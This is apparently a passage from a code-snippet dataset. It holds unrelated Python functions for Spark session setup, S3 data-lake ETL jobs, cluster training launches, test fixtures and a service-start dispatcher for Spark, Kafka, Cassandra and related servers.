train_pipeline.run(spark_session, args.standard_data_path)", "def main():\n spark = create_spark_session()\n\n input_data = \"s3a://udacitydenanodegree2020/\"\n output_data = \"s3a://udacitydenanodegree2020/output/\"\n\n process_song_data(spark, input_data, output_data) \n process_log_data(spark, input_data, output_data)", "def start_sml():\n launchfile = basepath + '/launch/teststarter.launch'\n\n uuid = roslaunch.rlutil.get_or_generate_uuid(None, False)\n #print roslaunch.rlutil.check_roslaunch(launchfile)\n #roslaunch.configure_logging(uuid)\n launch = roslaunch.parent.ROSLaunchParent(uuid, [launchfile])\n launch.start()", "def spark_session(request):\n def fin():\n \"\"\"Clean up.\n \"\"\"\n spark.stop()\n request.addfinalizer(fin)\n\n spark = ps.SparkSession.builder.master('local')\\\n .appName('Spark Tute PyTest')\\\n .config('spark.executor.memory', '2g')\\\n .config('spark.executor.cores', '2')\\\n .config('spark.cores.max', '10')\\\n .config('spark.ui.port', '4050')\\\n .config('spark.logConf', True)\\\n .config('spark.debug.maxToStringFields', 100)\\\n .getOrCreate()\n\n return spark", "def myjob(spark: SparkSession, **kwargs):\n df = spark.read.csv(\"spark-data/climatewatch-usemissions.csv\")\n\n df.show()", "def launch_training_job(master_nodes, trainset_date, opts, ec2_opts):\n # TODO: check whether HDFS is running\n # TODO: check whether YARN is running\n master = master_nodes[0].public_dns_name\n print(\"Setting up HDFS on the cluster..\")\n ssh(host=master, opts=ec2_opts, command=\"chmod u+x /root/spark-ec2/setup_pricer_data.sh\")\n ssh(host=master, opts=ec2_opts, command=\"/root/spark-ec2/setup_pricer_data.sh\")\n print(\"Running trainer with train date={d}..\".format(d=trainset_date))\n ssh(host=master, opts=ec2_opts, command=\"chmod u+x /root/spark-ec2/run_aws_trainer.sh\")\n ssh(host=master, opts=ec2_opts, command=\"nohup /root/spark-ec2/run_aws_trainer.sh {d} 2>&1 </dev/null |tee log.aws_trainer\".format(d=trainset_date))\n print(\"Trainer was launched successfully..\")", "def create_spark_session():\n try:\n spark = (\n SparkSession.builder\n .config(\"spark.jars.packages\", os.environ['SAS_JAR'])\n # .config(\"spark.hadoop.fs.s3a.awsAccessKeyId\", os.environ['AWS_ACCESS_KEY_ID'])\n # .config(\"spark.hadoop.fs.s3a.awsSecretAccessKey\", os.environ['AWS_SECRET_ACCESS_KEY'])\n .enableHiveSupport()\n .getOrCreate()\n )\n # spark._jsc.hadoopConfiguration().set(\"fs.s3a.awsAccessKeyId\", os.environ['AWS_ACCESS_KEY_ID'])\n # spark._jsc.hadoopConfiguration().set(\"fs.s3a.awsSecretAccessKey\", os.environ['AWS_SECRET_ACCESS_KEY'])\n # spark._jsc.hadoopConfiguration().set(\"fs.s3a.impl\",\"org.apache.hadoop.fs.s3a.S3AFileSystem\")\n # spark._jsc.hadoopConfiguration().set(\"com.amazonaws.services.s3.enableV4\", \"true\")\n # spark._jsc.hadoopConfiguration().set(\"fs.s3a.aws.credentials.provider\",\"org.apache.hadoop.fs.s3a.BasicAWSCredentialsProvider\")\n # spark._jsc.hadoopConfiguration().set(\"fs.s3a.endpoint\", \"s3.amazonaws.com\")\n except Exception as e:\n logger.error('Pyspark session failed to be created...')\n raise\n return spark", "def test_init(spark):\n io_handler = IOHandler(spark)\n assert io_handler", "def start_training(self, logdir: str, **info):\n pass", "def main(self, sc: SparkContext, *args: Any):\n experiment_parquet_path = args[0]\n mouse_parquet_path = args[1]\n embryo_parquet_path = args[2]\n impress_parquet_path = args[3]\n output_path = args[4]\n spark = SparkSession(sc)\n experiment_normalized_df = self.cross_reference_experiments(\n spark,\n 
experiment_parquet_path,\n mouse_parquet_path,\n embryo_parquet_path,\n impress_parquet_path,\n )\n experiment_normalized_df.write.mode(\"overwrite\").parquet(output_path)", "def main():\n spark = create_spark_session()\n input_data = \"s3a://udacity-dend\"\n output_data = \"s3a://vivek1bucket\"\n \n process_song_data(spark, input_data, output_data) \n process_log_data(spark, input_data, output_data)", "def launch(self):\n self.register_env_creator()\n\n # All worker nodes will block at this step during training\n ray_cluster_config = self.ray_init_config()\n if not self.is_master_node:\n return\n\n # Start the driver on master node\n ray.init(**ray_cluster_config)\n experiment_config = self.get_experiment_config()\n experiment_config = self.customize_experiment_config(experiment_config)\n print(\"Running experiment with config %s\" % json.dumps(experiment_config, indent=2))\n run_experiments(experiment_config)\n\n all_wokers_host_names = self.get_all_host_names()[1:]\n # If distributed job, send TERMINATION_SIGNAL to all workers.\n if len(all_wokers_host_names) > 0:\n self.sage_cluster_communicator.create_s3_signal(TERMINATION_SIGNAL)", "def main():\n spark = create_spark_session()\n input_data = \"s3a://udacity-dend/\"\n output_data = \"s3a://dend-bucket-cpm/\"\n\n process_song_data(spark, input_data, output_data)\n process_log_data(spark, input_data, output_data)", "def read_data(spark_session, filename_template, sample_size, channels, sample_prob, normalize_class_distribution, seed):\n # TODO: Clean this function up!!!\n assert channels in (1, 3)\n grayscale = False if channels == 3 else True\n\n # Sample (Optional)\n if sample_prob < 1:\n try:\n # Ex: `train_0.01_sample_256.parquet`\n sampled_filename_template = filename_template.format(\"{}_sample_\".format(sample_prob), sample_size, \"_grayscale\" if grayscale else \"\")\n filename = os.path.join(\"data\", sampled_filename_template)\n df = spark_session.read.load(filename)\n except: # Pre-sampled DataFrame not available\n filename = os.path.join(\"data\", filename_template.format(\"\", sample_size, \"_grayscale\" if grayscale else \"\"))\n df = spark_session.read.load(filename)\n p = sample_prob # sample percentage\n if normalize_class_distribution:\n # stratified sample with even class proportions\n n = df.count() # num examples\n K = 3 # num classes\n s = p * n # num examples in p% sample, as a fraction\n s_k = s / K # num examples per class in evenly-distributed p% sample, as fraction\n class_counts_df = df.select(\"tumor_score\").groupBy(\"tumor_score\").count()\n class_counts = {row[\"tumor_score\"]:row[\"count\"] for row in class_counts_df.collect()}\n ps = {k:s_k/v for k,v in class_counts.items()}\n df = df.sampleBy(\"tumor_score\", fractions=ps, seed=seed)\n else:\n # stratified sample maintaining the original class proportions\n df = df.sampleBy(\"tumor_score\", fractions={1: p, 2: p, 3: p}, seed=seed)\n # TODO: Determine if coalesce actually provides a perf benefit on Spark 2.x\n #train_df.cache(), val_df.cache() # cache here, or coalesce will hang\n # tc = train_df.count()\n # vc = val_df.count()\n #\n # # Reduce num partitions to ideal size (~128 MB/partition, determined empirically)\n # current_tr_parts = train_df.rdd.getNumPartitions()\n # current_val_parts = train_df.rdd.getNumPartitions()\n # ex_mb = sample_size * sample_size * channels * 8 / 1024 / 1024 # size of one example in MB\n # ideal_part_size_mb = 128 # 128 MB partitions sizes are empirically ideal\n # ideal_exs_per_part = round(ideal_part_size_mb / ex_mb)\n 
# tr_parts = round(tc / ideal_exs_per_part)\n # val_parts = round(vc / ideal_exs_per_part)\n # if current_tr_parts > tr_parts:\n # train_df = train_df.coalesce(tr_parts)\n # if current_val_parts > val_parts:\n # val_df = val_df.coalesce(val_parts)\n # train_df.cache(), val_df.cache()\n else:\n # Read in data\n filename = os.path.join(\"data\", filename_template.format(\"\", sample_size, \"_grayscale\" if grayscale else \"\"))\n df = spark_session.read.load(filename)\n\n return df", "def __init__(self, dataset_path):\n self.dataset_path = dataset_path\n conf = SparkConf().setAppName(\"movie_recommendation-server\")\n # IMPORTANT: pass aditional Python modules to each worker\n self.sc = SparkContext(conf=conf)\n logger.info(\"Starting up the Recommendation Engine: \")\n # Load ratings data for later use\n logger.info(\"Loading Ratings data...\")\n ratings_file_path = os.path.join(self.dataset_path, 'ratings.csv')\n ratings_raw_RDD = self.sc.textFile(ratings_file_path)\n ratings_raw_data_header = ratings_raw_RDD.take(1)[0]\n self.ratings_RDD = ratings_raw_RDD.filter(lambda line: line!=ratings_raw_data_header)\\\n .map(lambda line: line.split(\",\")).map(lambda tokens: (int(tokens[0]),int(tokens[1]),float(tokens[2]))).cache()\n # Pre-calculate movies ratings counts\n self.__count_and_average_ratings()\n # Train the model\n self.rank = 8\n self.seed = 5L\n self.iterations = 10\n self.regularization_parameter = 0.1\n # self.__train_model()", "def spark_unit_tests(\n global_args: dict = None, verbose: bool = False,\n withstreaming: bool = False):\n if global_args is None:\n global_args = globals()\n\n from pyspark.sql import SparkSession\n from pyspark import SparkConf\n\n conf = SparkConf()\n confdic = {\n \"spark.jars.packages\": os.environ[\"FINK_PACKAGES\"],\n \"spark.jars\": os.environ[\"FINK_JARS\"],\n \"spark.python.daemon.module\": \"coverage_daemon\"}\n conf.setMaster(\"local[2]\")\n conf.setAppName(\"fink_test\")\n for k, v in confdic.items():\n conf.set(key=k, value=v)\n spark = SparkSession\\\n .builder\\\n .appName(\"fink_test\")\\\n .config(conf=conf)\\\n .getOrCreate()\n\n # Reduce the number of suffled partitions\n spark.conf.set(\"spark.sql.shuffle.partitions\", 2)\n\n global_args[\"spark\"] = spark\n\n if withstreaming:\n dfstream = spark.readStream.format(\"kafka\")\\\n .option(\"kafka.bootstrap.servers\", os.environ[\"KAFKA_IPPORT_SIM\"])\\\n .option(\"subscribe\", os.environ[\"KAFKA_TOPIC\"])\\\n .option(\"startingOffsets\", \"earliest\").load()\n global_args[\"dfstream\"] = dfstream\n\n # Numpy introduced non-backward compatible change from v1.14.\n if np.__version__ >= \"1.14.0\":\n np.set_printoptions(legacy=\"1.13\")\n\n sys.exit(doctest.testmod(globs=global_args, verbose=verbose)[0])", "def test_integration(spark_context, hive_context, make_requests_session):\n def session_factory():\n return make_requests_session('requests/test_integration.sqlite3')\n\n with tempdir() as dir, xgboost_mutex():\n input_dir = os.path.join(dir, 'input')\n labeled_dir = os.path.join(dir, 'labeled')\n collect_dir = os.path.join(dir, 'features')\n feature_sel_dir = os.path.join(dir, 'pruned')\n folds_dir = os.path.join(dir, 'folded')\n trained_dir = os.path.join(dir, 'trained')\n\n # Generate some fake sessions and write them out\n hive_context.createDataFrame(\n spark_context.parallelize(islice(make_fake_rows(), 0, 2000)),\n INPUT_SCHEMA\n ).write.parquet(input_dir)\n\n # Apply data collection to those sessions.\n run_data_pipeline(\n spark_context, hive_context, input_dir, labeled_dir,\n 
wikis=[\"enwiki\"], samples_per_wiki=5000,\n min_sessions_per_query=1, search_cluster='localhost',\n brokers=None, samples_size_tolerance=0.5,\n session_factory=session_factory)\n\n # Collect features for the labeled dataset\n # When building the fixture the featureset has to actually exist on\n # whatever elasticsearch is serving up results.\n collect_features(\n spark_context, hive_context, labeled_dir, collect_dir,\n wikis=['enwiki'], search_cluster='localhost',\n brokers=None, ltr_feature_definitions='featureset:enwiki_v1',\n session_factory=session_factory)\n\n # Run feature selection\n run_feature_selection_pipeline(\n spark_context, hive_context, input_dir=collect_dir, output_dir=feature_sel_dir,\n algo='mrmr', num_features=10, pre_selected=None, wikis=None)\n\n # Generate folds to feed into training\n make_folds(\n spark_context, hive_context, feature_sel_dir, folds_dir,\n wikis=[\"enwiki\"], zero_features=None, num_folds=2,\n num_workers=1, max_executors=2)\n\n with open(os.path.join(folds_dir, 'stats.json'), 'r') as f:\n stats = json.load(f)\n\n # Train a model\n # TODO: training pipeline differs in that it expects the\n # directory to be created by the caller.\n os.mkdir(trained_dir)\n run_train_pipeline(\n spark_context, hive_context, folds_dir, trained_dir,\n wikis=[\"enwiki\"], initial_num_trees=10, final_num_trees=None,\n num_cv_jobs=1, iterations=3)\n\n with open(os.path.join(trained_dir, 'tune_enwiki.pickle'), 'rb') as f:\n tune = pickle.load(f)\n\n model_file = os.path.join(trained_dir, 'model_enwiki.xgb')\n pybooster = xgboost.Booster()\n pybooster.load_model(model_file)\n\n # [5:] trims file: off the beginning\n dmat = xgboost.DMatrix(stats['wikis']['enwiki']['all'][0]['all'][5:] + \".xgb\")\n eval_dmat = float(pybooster.eval(dmat).split(':')[1])\n\n expect = tune['metrics']['train'][-1]\n assert expect == pytest.approx(eval_dmat, abs=0.0001)\n\n # We have to coalesce(1) because for tests all executors run in same\n # JVM and it isn't thread safe to call into xgboost from multiple\n # executor threads in parallel.\n # model = XGBoostModel.loadModelFromLocalFile(spark_context, model_file)\n # df_data = hive_context.read.parquet(data_dir)\n # eval_df = model.eval(df_data.coalesce(1))\n\n # Our fake data has a hard time passing this test, because ndcg\n # in xgboost is unstable when multiple observations in the same\n # query have the same predicted score. This should only be a\n # problem when using randomly generated clicks to get labels.\n # assert expect == pytest.approx(eval_df, abs=0.0001)", "def do_start(self,processor):\n # app_logger = self.construct_logger(rta_constants.PROPERTIES_LOG_FILE)\n running_dict = {}\n for item in self.get_running_status():\n running_dict[item.get('processor')]=item.get('status')\n\n if processor == 'spark':\n if running_dict:\n if running_dict['spark<spark_worker>'] != 'Running' and running_dict['spark<spark_master>'] != 'Running':\n try:\n cmd_line = self.cmd_start_spark\n cmd = subprocess.Popen([cmd_line],shell=True,stdout=subprocess.PIPE)\n (output,err) = cmd.communicate()\n # app_logger.info('*********output logging **************')\n print(output)\n return\n except Exception as ex:\n print(\" Failed to run processor with ERROR(%s).\", str(ex))\n sys.exit(1)\n else:\n if running_dict['spark<spark_worker>'] == 'Running' or running_dict['spark<spark_master>'] == 'Running':\n print('Spark Server is running!! please trying to stop it before it starts.')\n return\n else:\n print('Please type correct command! 
You may use \"help start\" see more help')\n return\n\n elif processor == 'tomcat':\n if running_dict.has_key('tomcat') and running_dict['tomcat'] != 'Running':\n try:\n cmd_line = self.cmd_start_tomcat\n # print('staring tomcat server------->')\n print cmd_line\n\n # 2311 Vpl update to fix problem of catalina shutdown when term exit (10.x timeout)\n cmd = subprocess.call(['nohup',cmd_line,'start'])\n #cmd = subprocess.Popen([cmd_line],shell=True,stderr=subprocess.PIPE)\n #(output,err) = cmd.communicate()\n\n # app_logger.info('*********output logging **************')\n #print(output)\n return\n except Exception as ex:\n print(\" Failed to run processor with ERROR(%s).\", str(ex))\n sys.exit(1)\n else:\n if not running_dict.has_key('tomcat'):\n print('Please type correct command! You may use \"help start\" see more help')\n return\n else:\n print('Tomcat Server is running!! please trying to stop it before it start.')\n return\n\n elif processor == 'HDFS':\n #1/5/2017 Commit by JOJO\n '''\n if running_dict.has_key('HDFS') and running_dict['HDFS'] != 'Running':\n try:\n cmd_line = self.cmd_start_hadoop_hdfs\n cmd = subprocess.Popen([cmd_line],shell=True,stderr=subprocess.PIPE)\n # (output,err) = cmd.communicate()\n # print(output)\n # app_logger.info('*********output logging **************')\n # print(output)\n print('HDFS has been started!')\n except Exception as ex:\n print(\" Failed to run processor with ERROR(%s).\", str(ex))\n sys.exit(1)\n else:\n if not running_dict.has_key('HDFS'):\n print('Please type correct command! You may use \"help start\" see more help')\n return\n else:\n print('HDFS server is running!! please trying to stop it before it start.')\n return\n '''\n print('Please type correct command! You may use \"help start\" see more help')\n return\n elif processor == 'web_management':\n if running_dict.has_key('web_management') and running_dict['web_management'] != 'Running':\n try:\n cmd_line = 'python '+self.cmd_start_web_management\n print('starting web_management webserver------->')\n # print cmd_line\n cmd = subprocess.Popen([cmd_line],shell=True,stderr=subprocess.PIPE)\n (output,err) = cmd.communicate()\n print(output)\n # app_logger.info('*********output logging **************')\n # print(output)\n print('web_management webserver has been started!')\n except Exception as ex:\n print(\" Failed to run processor with ERROR(%s).\", str(ex))\n sys.exit(1)\n else:\n if not running_dict.has_key('web_management'):\n print('Please type correct command! You may use \"help start\" see more help')\n return\n else:\n print('Flask webserver is running!! please trying to stop it before it start.')\n return\n\n elif processor == 'novelty':\n if running_dict.has_key('novelty') and running_dict['novelty'] != 'Running' and running_dict['spark<spark_worker>'] == 'Running' and running_dict['spark<spark_master>'] == 'Running':\n try:\n cmd_line = self.cmd_start_novelty_detector\n # print('staring novelty------->')\n # print cmd_line\n cmd = subprocess.Popen([cmd_line],shell=True,stderr=subprocess.PIPE)\n # (output,err) = cmd.communicate()\n\n # app_logger.info('*********output logging **************')\n print('novelty has been started!')\n return\n except Exception as ex:\n print(\" Failed to run processor with ERROR(%s).\", str(ex))\n sys.exit(1)\n else:\n if not running_dict.has_key('novelty'):\n print('Please type correct command! You may use \"help start\" see more help')\n return\n elif running_dict['novelty'] == 'Running':\n print('novelty processor is running!! 
please trying to stop it before it start.')\n return\n elif running_dict['spark<spark_worker>'] == 'Stopped' or running_dict['spark<spark_master>'] == 'Stopped':\n print('Please start spark first!! trying to use command \"start spark\"')\n return\n\n elif processor == 'raw_writer':\n if running_dict.has_key('raw_writer') and running_dict['raw_writer'] != 'Running' and running_dict['spark<spark_worker>'] == 'Running' and running_dict['spark<spark_master>'] == 'Running':\n try:\n cmd_line = self.cmd_start_raw_writer\n # print('staring raw_writer------->')\n # print cmd_line\n cmd = subprocess.Popen([cmd_line],shell=True,stderr=subprocess.PIPE)\n # (output,err) = cmd.communicate()\n print('raw_writer has been started!')\n return\n\n # app_logger.info('*********output logging **************')\n # print(output)\n except Exception as ex:\n print(\" Failed to run processor with ERROR(%s).\", str(ex))\n sys.exit(1)\n else:\n if not running_dict.has_key('raw_writer'):\n print('Please type correct command! You may use \"help start\" see more help')\n return\n elif running_dict['raw_writer'] == 'Running':\n print('raw_writer processor is running!! please trying to stop it before it start.')\n return\n elif running_dict['spark<spark_worker>'] == 'Stopped' or running_dict['spark<spark_master>'] == 'Stopped':\n print('Please start spark first!! trying to use command \"start spark\"')\n return\n\n elif processor == 'cassandra':\n if running_dict.has_key('cassandra') and running_dict['cassandra'] != 'Running':\n try:\n cmd_line = self.cmd_start_cassandra\n # print('starting cassandra------->')\n # print cmd_line\n\n #2311 Vpl update to fix problem of cassandra shutdown when term exit (10.x timeout)\n #cmd = subprocess.Popen([cmd_line],shell=True,stderr=subprocess.PIPE)\n cmd = subprocess.call(['nohup',cmd_line])\n #(output,err) = cmd.communicate()\n\n # app_logger.info('*********output logging **************')\n # print(output)\n print ('cassandra has been started!')\n return\n except Exception as ex:\n print(\" Failed to run processor with ERROR(%s).\", str(ex))\n sys.exit(1)\n else:\n if not running_dict.has_key('cassandra'):\n print('Please type correct command! You may use \"help start\" see more help')\n return\n else:\n print('cassandra Server is running!! please trying to stop it before it start.')\n return\n\n elif processor == 'kairosDb':\n if running_dict.has_key('kairosDb') and running_dict['kairosDb'] != 'Running' and running_dict['cassandra']=='Running':\n try:\n cmd_line = self.cmd_start_kairosDB\n # print('staring kairosDB------->')\n\n # print cmd_line\n\t\t\t\t\t#2311 Vpl update to fix problem of kairosDb shutdown when term exit (10.x timeout)\n\t\t\t\t\t#cmd = subprocess.Popen([cmd_line],shell=True,stderr=subprocess.PIPE)\n cmd = subprocess.call(['nohup',cmd_line,'start'])\n #(output,err) = cmd.communicate()\n\n # app_logger.info('*********output logging **************')\n print('kairosDb has been started!')\n return\n except Exception as ex:\n print(\" Failed to run processor with ERROR(%s).\", str(ex))\n sys.exit(1)\n else:\n if not running_dict.has_key('kairosDb'):\n print('Please type correct command! You may use \"help start\" see more help')\n return\n elif running_dict['cassandra']=='Stopped':\n print('cassandra required starting before kairosDb is running!! please trying to \"start cassandra\" first')\n return\n elif running_dict['kairosDB'] == 'Running':\n print('kairosDB Server is running!! 
please trying to stop it before it starts.')\n return\n\n elif processor == 'grafana':\n if running_dict.has_key('grafana') and running_dict['grafana'] != 'Running' and running_dict['kairosDb']=='Running':\n try:\n cmd_line = self.cmd_start_grafana\n # print('staring grafana------->')\n # print cmd_line\n cmd = subprocess.Popen([cmd_line],shell=True,stderr=subprocess.PIPE)\n # (output,err) = cmd.communicate()\n # app_logger.info('*********output logging **************')\n # print(output)\n print ('grafana has been started!')\n return\n except Exception as ex:\n print(\" Failed to run processor with ERROR(%s).\", str(ex))\n sys.exit(1)\n else:\n if not running_dict.has_key('grafana'):\n print('Please type correct command! You may use \"help start\" see more help')\n return\n elif running_dict['kairosDb']=='Stopped':\n print('kairosDb required starting before grafana is running!! please trying to \"start kairoseDb\" first')\n return\n elif running_dict['grafana'] == 'Running':\n print('grafana Server is running!! please trying to stop it before it starts.')\n return\n\n elif processor == 'kafka':\n if running_dict.has_key('kafka') and running_dict['kafka'] != 'Running' and running_dict['zookeeper']=='Running':\n try:\n cmd_line = self.cmd_start_kafka\n print('starting kafka------->')\n # print cmd_line\n\n #2311 Vpl update to fix problem of zookeeper shutdown when term exit (10.x timeout)\n #cmd = subprocess.Popen([cmd_line],shell=True,stderr=subprocess.PIPE)\n cmd = subprocess.Popen(cmd_line)\n # (output,err) = cmd.communicate()\n # print (output)\n print ('kafka has been started!')\n return\n # app_logger.info('*********output logging **************')\n # print(output)\n except Exception as ex:\n print(\" Failed to run processor with ERROR(%s).\", str(ex))\n sys.exit(1)\n else:\n if not running_dict.has_key('kafka'):\n print('Please type correct command! You may use \"help start\" see more help')\n return\n elif running_dict['zookeeper']=='Stopped':\n print('zookeeper required starting before kafka is running!! please trying to \"start zookeeper\" first')\n return\n elif running_dict['kafka'] == 'Running':\n print('Kafka Server is running!! please trying to stop it before it starts.')\n return\n\n elif processor == 'zookeeper':\n if running_dict.has_key('zookeeper') and running_dict['zookeeper'] != 'Running':\n try:\n cmd_line = self.cmd_start_zookeeper\n # print('staring zookeeper------->')\n # print (cmd_line)\n\n #2311 Vpl update to fix problem of zookeeper shutdown when term exit (10.x timeout)\n #cmd = subprocess.Popen([cmd_line],shell=True,stderr=subprocess.PIPE)\n cmd = subprocess.Popen(cmd_line)\n # (output,err) = cmd.communicate()\n # print (output)\n\n print('zookeeper has been started!')\n return\n except Exception as ex:\n print(\" Failed to stop processor with ERROR(%s).\", str(ex))\n sys.exit(1)\n else:\n if not running_dict.has_key('zookeeper'):\n print('Please type correct command! You may use \"help start\" see more help')\n return\n else:\n print('Zookeeper Server is running!! 
please trying to stop it before it starts.')\n return\n\n elif processor == 'accl_processor':\n if running_dict:\n if running_dict['accl_processor'] != 'Running' and running_dict['spark<spark_worker>'] == 'Running' and running_dict['spark<spark_master>'] == 'Running' and running_dict['zookeeper'] == 'Running' and running_dict['kafka'] == 'Running':\n try:\n cmd_line = self.cmd_start_accl_processor\n print cmd_line\n cmd = subprocess.Popen([cmd_line],shell=True,stderr=subprocess.PIPE)\n #cmd = subprocess.Popen(['nohup',cmd_line])\n # cmd = subprocess.Popen(cmd_line)\n\n print ('Accelerometer processor has been started')\n return\n except Exception as ex:\n print(\" Failed to run processor with ERROR(%s).\", str(ex))\n sys.exit(1)\n else:\n if running_dict['accl_processor'] == 'Running':\n print('Accelerometer processor is running!! please trying to stop it before it starts.')\n return\n elif running_dict['spark<spark_worker>'] == 'Stopped' or running_dict['spark<spark_master>'] == 'Stopped':\n print('Please start spark first!! trying to use command \"start spark\"')\n return\n elif running_dict['zookeeper'] == 'Stopped':\n print('Please start zookeeper server first!! trying to use command \"start zookeeper\"')\n return\n elif running_dict['kafka'] == 'Stopped':\n print('Please start kafka server first!! trying to use command \"start kafka\"')\n return\n else:\n print('Please type correct command! You may use \"help start\" see more help')\n sys.exit(1)\n\n elif processor == 'baro_processor':\n if running_dict:\n if running_dict['baro_processor'] != 'Running' and running_dict['spark<spark_worker>'] == 'Running' and running_dict['spark<spark_master>'] == 'Running' and running_dict['zookeeper'] == 'Running' and running_dict['kafka'] == 'Running':\n try:\n cmd_line = self.cmd_start_baro_processor\n cmd = subprocess.Popen([cmd_line],shell=True,stderr=subprocess.PIPE)\n print ('Barometer processor has been started')\n\t\t\tprint (cmd_line)\n return\n except Exception as ex:\n print(\" Failed to run processor with ERROR(%s).\", str(ex))\n sys.exit(1)\n else:\n if running_dict['baro_processor'] == 'Running':\n print('Barometer processor is running!! please trying to stop it before it starts.')\n return\n elif running_dict['spark<spark_worker>'] == 'Stopped' or running_dict['spark<spark_master>'] == 'Stopped':\n print('Please start spark first!! trying to use command \"start spark\"')\n return\n elif running_dict['zookeeper'] == 'Stopped':\n print('Please start zookeeper server first!! trying to use command \"start zookeeper\"')\n return\n elif running_dict['kafka'] == 'Stopped':\n print('Please start kafka server first!! trying to use command \"start kafka\"')\n return\n else:\n print('Please type correct command! You may use \"help start\" see more help')\n sys.exit(1)\n\n elif processor == 'gyro_processor':\n if running_dict:\n if running_dict['gyro_processor'] != 'Running' and running_dict['spark<spark_worker>'] == 'Running' and running_dict['spark<spark_master>'] == 'Running' and running_dict['zookeeper'] == 'Running' and running_dict['kafka'] == 'Running':\n try:\n cmd_line = self.cmd_start_gyro_processor\n cmd = subprocess.Popen([cmd_line],shell=True,stderr=subprocess.PIPE)\n print ('Gyroscope processor has been started')\n return\n except Exception as ex:\n print(\" Failed to run processor with ERROR(%s).\", str(ex))\n sys.exit(1)\n else:\n if running_dict['gyro_processor'] == 'Running':\n print('Gyroscope processor is running!! 
please trying to stop it before it starts.')\n return\n elif running_dict['spark<spark_worker>'] == 'Stopped' or running_dict['spark<spark_master>'] == 'Stopped':\n print('Please start spark first!! trying to use command \"start spark\"')\n return\n elif running_dict['zookeeper'] == 'Stopped':\n print('Please start zookeeper server first!! trying to use command \"start zookeeper\"')\n return\n elif running_dict['kafka'] == 'Stopped':\n print('Please start kafka server first!! trying to use command \"start kafka\"')\n return\n else:\n print('Please type correct command! You may use \"help start\" see more help')\n sys.exit(1)\n\n elif processor == 'aggr_processor':\n if running_dict:\n if running_dict['aggr_processor'] != 'Running' and running_dict['spark<spark_worker>'] == 'Running' and running_dict['spark<spark_master>'] == 'Running' and running_dict['zookeeper'] == 'Running' and running_dict['kafka'] == 'Running':\n try:\n cmd_line = self.cmd_start_aggr_naiv\n cmd = subprocess.Popen([cmd_line],shell=True,stderr=subprocess.PIPE)\n print ('Aggregator processor has been started')\n return\n except Exception as ex:\n print(\" Failed to run processor with ERROR(%s).\", str(ex))\n sys.exit(1)\n else:\n if running_dict['aggr_processor'] == 'Running':\n print('Aggregator processor is running!! please trying to stop it before it starts.')\n return\n elif running_dict['spark<spark_worker>'] == 'Stopped' or running_dict['spark<spark_master>'] == 'Stopped':\n print('Please start spark first!! trying to use command \"start spark\"')\n return\n elif running_dict['zookeeper'] == 'Stopped':\n print('Please start zookeeper server first!! trying to use command \"start zookeeper\"')\n return\n elif running_dict['kafka'] == 'Stopped':\n print('Please start kafka server first!! trying to use command \"start kafka\"')\n return\n else:\n print ('Please type correct command! You may use \"help start\" see more help')\n sys.exit(1)\n\n else:\n print ('Please type correct command! 
You may use \"help start\" see more help')", "def pytest_configure() -> None: # pragma: no cover\n print(\"Starting server app\")\n PROC.start()\n time.sleep(1)\n if PROC.exitcode is not None:\n pytest.exit(\"Failed to start the server, exit code {}\\nLogs are in logs/server.log\".format(PROC.exitcode))\n return\n\n create_generated_client()", "def test_training():\n assert init_engine('train', [\"config=first_run_test/default.yaml\"]).run() is None", "def add_spark(self,node):\n import os\n import json\n from urllib.request import urlopen\n import ssl\n if \"SPARK_ENV_LOADED\" not in os.environ:\n return # no Spark\n\n spark = ET.SubElement(node, 'spark')\n try:\n import requests\n import urllib3\n urllib3.disable_warnings()\n except ImportError:\n ET.SubElement(spark,'error').text = \"SPARK_ENV_LOADED present but requests module not available\"\n return \n\n host = 'localhost'\n p1 = 4040\n p2 = 4050\n import urllib.error\n for port in range(p1,p2+1):\n try:\n url = 'http://{}:{}/api/v1/applications/'.format(host,port)\n resp = urlopen(url, context=ssl._create_unverified_context())\n spark_data = resp.read()\n break\n except (ConnectionError, ConnectionRefusedError, urllib.error.URLError) as e:\n continue\n if port>=p2:\n ET.SubElement(spark,'error').text = f\"SPARK_ENV_LOADED present but no listener on {host} ports {p1}-{p2}\"\n return\n\n # Looks like we have Spark!\n for app in json.loads(spark_data):\n app_id = app['id']\n app_name = app['name']\n e = ET.SubElement(spark,'application',{'id':app_id,'name':app_name})\n\n attempt_count = 1\n for attempt in app['attempts']:\n e = ET.SubElement(spark,'attempt')\n json_to_xml(e,attempt)\n for param in ['jobs','allexecutors','storage/rdd']:\n url = f'http://{host}:{port}/api/v1/applications/{app_id}/{param}'\n resp = urlopen(url, context=ssl._create_unverified_context())\n data = resp.read()\n e = ET.SubElement(spark,param.replace(\"/\",\"_\"))\n json_to_xml(e,json.loads(data))", "def setup():\n # Parse the command line arguments\n args = parse_arguments()\n\n # Load training configurations\n config = load_yaml(args.config)\n update_not_none(config, vars(args))\n\n # Setup experiment directories and update them to configurations\n setup_dirs(config)\n\n # Setup loggers\n del logging.getLogger('tensorflow').handlers[0]\n setup_loggers(config['log_dir'])\n\n # Setup GPUs\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = config['gpu']\n\n # Backup source code\n backup_src(config['src_dir'])\n\n return config", "def create_spark_session(KEY, SECRET):\n spark = SparkSession \\\n .builder \\\n .appName(\"S3 Data Lake\") \\\n .config(\"spark.executor.heartbeatInterval\", \"3600s\")\\\n .config(\"spark.network.timeout\", \"36000s\")\\\n .config(\"spark.driver.memory\", \"16g\")\\\n .config(\"spark.driver.maxResultSize\", \"16g\")\\\n .config(\"spark.executor.memory\", \"16g\")\\\n .config(\"spark.python.worker.memory\", \"2g\")\\\n .getOrCreate()\n \n # Some other configs\n hadoop_conf = spark.sparkContext._jsc.hadoopConfiguration()\n hadoop_conf.set(\"fs.s3n.impl\", \"org.apache.hadoop.fs.s3native.NativeS3FileSystem\")\n hadoop_conf.set(\"fs.s3n.awsAccessKeyId\", KEY)\n hadoop_conf.set(\"fs.s3n.awsSecretAccessKey\", SECRET)\n\n #spark.sparkContext.setSystemProperty(\"com.amazonaws.services.s3.enableV4\", \"true\")\n return spark", "def main(): \n spark = create_spark_session()\n print(\"Spark Session Created\")\n\n #Print S3 bucket location\n s3_bucket=os.environ[\"s3_bucket\"]\n s3_bucket = s3_bucket.replace(\"'\", \"\")\n \n print (s3_bucket)\n \n 
